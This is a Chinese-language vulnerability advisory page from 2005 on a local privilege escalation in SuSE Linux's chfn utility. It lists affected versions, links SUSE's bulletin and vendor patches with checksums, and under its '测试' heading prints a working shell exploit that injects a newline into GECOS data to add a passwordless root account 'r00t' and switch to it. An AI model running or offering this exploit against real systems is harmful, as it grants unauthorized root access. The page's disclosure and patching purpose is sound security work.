⊙ 在线帮助
⊙ 添加收藏
⊙ 网站地图
最新资讯
技术中心
下载园地
漏洞总汇
在线书籍
X-档案
法规标准
技术论坛
 您现在的位置 >> 首页 >> 漏洞总汇 >> 操作系统 >> Linux
 
 
SuSE Linux <= 9.3, 10 (chfn) 本地权限提升漏洞

【责 编】:AcOol
【作 者】:AcOol翻译整理
【添 加】:2005-11-9
【更 新】:2005-11-9
【出 处】:酷客天堂
【字 体】:[   ]
【浏 览】:
受影响系统:
SUSE LINUX 10.0 
SUSE LINUX 9.3 
SUSE LINUX 9.2 
SUSE LINUX 9.1 
SuSE Linux 9.0 
SuSE Linux Desktop 1.0 
SuSE Linux Enterprise Server 8 
SUSE SLES 9 
UnitedLinux 1.0
描述:
SUSE Linux是常用Linux系统,Thomas Gerisch 当GECOS信息变化时,pwdutils包中的'chfn'程序不能对其做有效的验证,从而导致本地权限的提升。

SUSE安全公告:
http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html
测试:
if [ X"$SHELL" = "X" ]; then
    echo "No SHELL environment, using /bin/sh for default."
    export SHELL=/bin/sh
fi

if [ -u /usr/bin/chfn ]; then
    /bin/echo "Type your current password to get root... :)"
    /usr/bin/chfn -h "`echo -e ’:/:’$SHELL’\nr00t::0:0:’`" $USER > /dev/null
    if [ -u /bin/su ]; then
        /bin/su r00t
        /bin/echo "You can get root again with ’su r00t’"
    else 
        echo "/bin/su file is not setuid root :("
    fi
else
echo "/usr/bin/chfn file is not setuid root :("
fi
建议:
厂商补丁:
    厂商已经提供补丁,建议安装。
   x86 Platform: 
    
   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/pwdutils-3.0.4-4.2.i586.rpm
          385e9ef4f03e67ddb50a6a21d5b9f0e9
   
   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/pwdutils-2.6.96-4.2.i586.rpm
          4705772232599de3a2d9dc83c922ee47
   
   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/pwdutils-2.6.90-6.2.i586.rpm
          aae77d1eab9d617be89ab993f9f8a47d
   
   SUSE LINUX 9.1:
   ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/pwdutils-2.6.4-2.18.3.i586.rpm
          5e957e0370ac82874979e0c02187517e
   
   SuSE Linux 9.0:
   ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/shadow-4.0.3-267.i586.rpm
          8cf127c4d2e74f17cf0ff058f4feaf00
   
   Power PC Platform:
   
   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/pwdutils-3.0.4-4.2.ppc.rpm
          533274d92b8375bc51b6a3684c1cf506
   
   x86-64 Platform:
   
   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/pwdutils-3.0.4-4.2.x86_64.rpm
          cc54040195f24925474d1896c45ccb30
   
   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/pwdutils-2.6.96-4.2.x86_64.rpm
          785543d9276bd5de611ce0e82bc3c066
   
   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/pwdutils-2.6.90-6.2.x86_64.rpm
          82b384b4d65189c2af84677d7fc02dba
   
   SUSE LINUX 9.1:
   ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/pwdutils-2.6.4-2.18.3.x86_64.rpm
          f5d860c203d8dc5c6b85318229fe68d8
   
   SuSE Linux 9.0:
   ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/shadow-4.0.3-267.x86_64.rpm
          384136f520ebf09d3be779291da92c8d
   
   Sources:
   
   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/pwdutils-3.0.4-4.2.src.rpm
          f4b6aedde6cf93e1fe5b47bda874e72a
   
   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/pwdutils-2.6.96-4.2.src.rpm
          cb0d28c88ecf013418234ed39ff87e85
   
   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/pwdutils-2.6.90-6.2.src.rpm
          e8854e2433279f4a2650d354a07f3605
   
   SUSE LINUX 9.1:
   ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/pwdutils-2.6.4-2.18.3.src.rpm
          81453f140a633eeb0b0a841b857e49a5
   ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/pwdutils-2.6.4-2.18.3.src.rpm
          7f5d161dae57bf1fb64cd39269b5255c
   
   SuSE Linux 9.0:
   ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/shadow-4.0.3-267.src.rpm
          6cc9c84bdea5f04c290c55c942327bb0
   ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/shadow-4.0.3-267.src.rpm
          d463b528a727655b392230302d998976
·本站特别声明不要转载或作者授权本站独家播发的文章,请勿转载。
·本站原创文章可自由转载,但本站作者及本站链接必须保留。
·非本站原创文章可自由转载,请按作者及文章出处一节,自行链接。
·转载之图片、文件,链接请不要盗链到本站,且不准打上各自站点的水印,亦不能抹去我站点水印。

+ 本站推荐 +
·LibTiff TIFFFetchData整数溢出
·WinISO/UltraISO/MagicISO/Pow
·Invision Power Board func_ms
·Linux Kernel SMBFS chroot目录
·Linux Kernel CIFS chroot目录
+ 相关漏洞 +
·Linux Kernel SMBFS chroot目录
·Linux Kernel CIFS chroot目录
·Linux Kernel IP_ROUTE_INPUT本
·Linux Kernel Intel EM64T SYS
·LHA缓冲区溢出/目录遍历漏洞
+ 热点漏洞 +
·Microsoft Windows Media Play
·RARLAB WinRAR命令行处理溢出漏
·Microsoft IE JavaScript OnLo
·SuSE Linux <= 9.3, 10 (chfn)
·McAfee VirusScan路径指定权限
+ 本站发布 +
 
 
关于站点 | 免责申明 | 版权隐私 | 业务合作 | 提供捐助 | 联系我们 Copyright © 2001-2005 CoolerSky. All Rights Reserved.